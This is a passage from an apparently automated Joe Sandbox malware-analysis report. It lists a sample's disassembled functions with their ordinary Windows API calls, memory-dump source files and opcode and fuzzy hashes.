              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BAC13D,00000000,?,00BA67E2,?,00000008,?,00BA89AD,?,?,?), ref: 00BA854A
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: 4e8d367f5163b59462c4f68932594ffd80f0b124d0bead03955862edaff2cea2
              • Instruction ID: ebee6c03b07c10c7b7c4ed53991871643978af2786fb2a6cb158b6ef2a7f9053
              • Opcode Fuzzy Hash: 4e8d367f5163b59462c4f68932594ffd80f0b124d0bead03955862edaff2cea2
              • Instruction Fuzzy Hash: 90E0E531D8C2615BEB312A699C01B9E3BCCDF637B0F1406A0AC58A6880CE20CC0045E5
              Function 00B8A4C6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
              Download Yara Rule
              APIs
              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00B8A4F5
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: CloseFind
              • String ID:
              • API String ID: 1863332320-0
              • Opcode ID: 97c0366397320b324aa8a963e3a2ceec03af764e6aa507ea0e4f391e68c88c19
              • Instruction ID: 2a14d166d9801e3bdafb43f29690f71276d680ceaf8da3446487083e26219aa2
              • Opcode Fuzzy Hash: 97c0366397320b324aa8a963e3a2ceec03af764e6aa507ea0e4f391e68c88c19
              • Instruction Fuzzy Hash: 2AF05435409780AADA227B7888047D67BD1AF16371F04CA8AF5F9121A1C6B554D5D723
              Function 00B9067C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
              Download Yara Rule
              APIs
              • SetThreadExecutionState.KERNEL32(00000001), ref: 00B906B1
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ExecutionStateThread
              • String ID:
              • API String ID: 2211380416-0
              • Opcode ID: 6a09e5b414f615d22f702cf34d4ef0bfca7ceb1c43afca6df4bedbc3405546cf
              • Instruction ID: 0a6738bfb5463a878eaa3a958dfc5dfae4e63e60a24a24b47aa1f9b06a6c1e5b
              • Opcode Fuzzy Hash: 6a09e5b414f615d22f702cf34d4ef0bfca7ceb1c43afca6df4bedbc3405546cf
              • Instruction Fuzzy Hash: 68D02B212280107ACE21332CA805BFE1BD64FC3711F0900F9B00D135D38F4608C7A3E2
              Function 00B99D7B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
              Download Yara Rule
              APIs
              • GdipAlloc.GDIPLUS(00000010), ref: 00B99D81
                • Part of subcall function 00B99B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B99B30
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: Gdip$AllocBitmapCreateFromStream
              • String ID:
              • API String ID: 1915507550-0
              • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
              • Instruction ID: a6ea165bf9ec9ece6dbce2d658af5ac3f368aadbfe50c141805393751907c6c6
              • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
              • Instruction Fuzzy Hash: 73D0C73065520D7ADF81BF799C4297A7BE9DF11350F1081B9BD0886152ED72DE10A661
              Function 00B89989 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
              Download Yara Rule
              APIs
              • GetFileType.KERNELBASE(000000FF,00B89887), ref: 00B89995
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: FileType
              • String ID:
              • API String ID: 3081899298-0
              • Opcode ID: bc2f49225fe0dc96281ea7e9e4df728bc08d7767f238151357cd7984b86ef3d1
              • Instruction ID: acf7c78bd70d196ad407070e25c3da736c0dafc740a34d45bf719c858d7206de
              • Opcode Fuzzy Hash: bc2f49225fe0dc96281ea7e9e4df728bc08d7767f238151357cd7984b86ef3d1
              • Instruction Fuzzy Hash: 84D01231011140968F2566345D091B977D1DF83366B7CC7E8D025C50B1D723C803F641
              Function 00B9D41A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
              Download Yara Rule
              APIs
              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00B9D43F
                • Part of subcall function 00B9AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B9AC85
                • Part of subcall function 00B9AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B9AC96
                • Part of subcall function 00B9AC74: IsDialogMessageW.USER32(00010442,?), ref: 00B9ACAA
                • Part of subcall function 00B9AC74: TranslateMessage.USER32(?), ref: 00B9ACB8
                • Part of subcall function 00B9AC74: DispatchMessageW.USER32(?), ref: 00B9ACC2
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: Message$DialogDispatchItemPeekSendTranslate
              • String ID:
              • API String ID: 897784432-0
              • Opcode ID: f53cdaee93219ecb9d27afc04a87650ccddc5d7c28ad42228b22055b7399f29b
              • Instruction ID: 9ead5b54a804dcb953bc099dba3cb4b37a0727728dce1c7bd27dd7b789b31007
              • Opcode Fuzzy Hash: f53cdaee93219ecb9d27afc04a87650ccddc5d7c28ad42228b22055b7399f29b
              • Instruction Fuzzy Hash: 22D09E31144300BBDA152B51CE06F1F7AF6AB88B04F004594B344750B18A72AD20DB16
              Function 00B9D8B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 829c7c1f8f0d2889e68e2d474f8fb0aed834b69a33f76280c5ed322f6136cce2
              • Instruction ID: b84ce0e8df38f65261f1ec93f20955b33cdcf3dc5aa1ebcf8aace9d5631096b5
              • Opcode Fuzzy Hash: 829c7c1f8f0d2889e68e2d474f8fb0aed834b69a33f76280c5ed322f6136cce2
              • Instruction Fuzzy Hash: 83B012922AC0016D35086607AC83F3602CCC4C1B10330C0FAB409E01C2D5C05C090432
              Function 00B9D8AC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 1ade8ae0ad4b189c70447eb1d312dccc83fde374d9858d91d0ff11d8ee37e826
              • Instruction ID: cfe43fa44e98478dd7acef62b8514af8b8040d37b9359d990d823ddf90abb6ce
              • Opcode Fuzzy Hash: 1ade8ae0ad4b189c70447eb1d312dccc83fde374d9858d91d0ff11d8ee37e826
              • Instruction Fuzzy Hash: 25B0129626C101AD35086207ADC3F3B02CCD4C0B1033040FEB009E00C2D5C05C040532
              Function 00B9D891 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 646ce9bdffb78036bdb721b6d0574811fb3fbc4e81e7fe9f2afee46f5888714a
              • Instruction ID: 2597a243578677318b041f732969a4ea102769c4cc8c6f1b7d8fb18216f424b8
              • Opcode Fuzzy Hash: 646ce9bdffb78036bdb721b6d0574811fb3fbc4e81e7fe9f2afee46f5888714a
              • Instruction Fuzzy Hash: C8B0129626C3017D39082203ADD3F3B02CCC4C0B1033045FAB009F00D2D5C05C484432
              Function 00B9D8FC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: f97cbb1fb259426bc7d19e37d7b039cd29f30de6e45c55d47e16ca1a2184723b
              • Instruction ID: 830dd1af54c0e07d3d61d16dae3f166a66be8061c5537358a88797992886f84b
              • Opcode Fuzzy Hash: f97cbb1fb259426bc7d19e37d7b039cd29f30de6e45c55d47e16ca1a2184723b
              • Instruction Fuzzy Hash: 1FB012A226C0016D390C6207AC83F3602CCC4C0B1033040FEB00DE00D2D5C05D040432
              Function 00B9D8F2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: d3d7a216dcdcc1e9144376fa4885d2e6dd56b49b8331139481f7821f903c79f5
              • Instruction ID: 6543b0f661f6ae8f2f828fc2a5179e73f0b5afa0af1de78fa667f86383bbff14
              • Opcode Fuzzy Hash: d3d7a216dcdcc1e9144376fa4885d2e6dd56b49b8331139481f7821f903c79f5
              • Instruction Fuzzy Hash: 54B012A226C0016D390C6207AD83F3602CCC4C0B1033040FAB00DE00D2D9C05E050432
              Function 00B9D8E8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: a378b701272b46617c0e8586e09e26da7dcbc6206de5c7c8f14c0cbecb28b357
              • Instruction ID: 05490d814eea271242c0e4f6397ec1e3b921d32cbc1972f7409a4a2043623f8f
              • Opcode Fuzzy Hash: a378b701272b46617c0e8586e09e26da7dcbc6206de5c7c8f14c0cbecb28b357
              • Instruction Fuzzy Hash: 11B012A226C1016D39486207AC83F3602CCC4C0B1033041FAB00DE00D2D5C05D440432
              Function 00B9D8DE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: b2fefae09945a1026a43d4917ff5d8d50b362f90cdc78f5f541cc35f88e836d8
              • Instruction ID: 0e787e6345a465b067a693d8fd29c84911fee9f7e0032d9030488fce2fb5f65d
              • Opcode Fuzzy Hash: b2fefae09945a1026a43d4917ff5d8d50b362f90cdc78f5f541cc35f88e836d8
              • Instruction Fuzzy Hash: 89B012A226C0016D39086207AC83F3602CCC4C1B1033080FAB40DE00D2D5C05D040432
              Function 00B9D8CA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: a6bd9eefdeedc92c4018de7504b841c5cb226eb43095f579dee66b77474022ef
              • Instruction ID: 3e5dd8e56a8f562aa8185fab097078147fb22d09a60ed665b8180693c64fe753
              • Opcode Fuzzy Hash: a6bd9eefdeedc92c4018de7504b841c5cb226eb43095f579dee66b77474022ef
              • Instruction Fuzzy Hash: 45B012922AC0016D350C6607AD83F3602CCC4C0B1033080FAB009E01C2D9C05D0E0432
              Function 00B9D8C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 1575ee9b7e12c636a600df8911b686e656fd7a294f8bc0fdd25701296cfb108c
              • Instruction ID: a4f48885472ed1323eb9e1ca6d721d2066005193c296d777d28ade1cdd90f0bf
              • Opcode Fuzzy Hash: 1575ee9b7e12c636a600df8911b686e656fd7a294f8bc0fdd25701296cfb108c
              • Instruction Fuzzy Hash: F1B012922AC1416D35486207BC83F3602CCC4C0B1033081FAB009E01C2D5C05C890432
              Function 00B9E1F9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E20B
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: bc733540d8dedd06d18a087ae65697635ffeb0d32447b553167e38f188af08e3
              • Instruction ID: 9331bde4d9436485dc325daf31f66061695ca001dac1a78f8776a4e1cb6a0264
              • Opcode Fuzzy Hash: bc733540d8dedd06d18a087ae65697635ffeb0d32447b553167e38f188af08e3
              • Instruction Fuzzy Hash: D3B0129226E001BD360C57027D07D7603DCC4C0B6233084FAB115E40D29AC0DC058032
              Function 00B9D92E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
